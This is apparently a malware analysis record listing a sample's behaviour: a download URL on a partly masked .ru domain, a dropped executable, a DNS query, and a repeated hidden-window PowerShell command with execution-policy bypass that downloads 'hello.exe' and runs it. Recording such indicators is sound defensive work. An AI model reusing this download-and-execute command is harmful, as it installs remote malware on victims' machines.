Technical Information
- http://ss#####euegsgrfnu.ru/hello.exe?gv##### as %localappdata%\tempbxa52.exe
- %LOCALAPPDATA%\tempbxa52.exe
- DNS ASK ss#####euegsgrfnu.ru
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://ss#####euegsgrfnu.ru/hello.exe?Gv########################## & stArT %teMp%B...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://ss#####euegsgrfnu.ru/hello.exe?Gv########################## & stArT %teMp%B...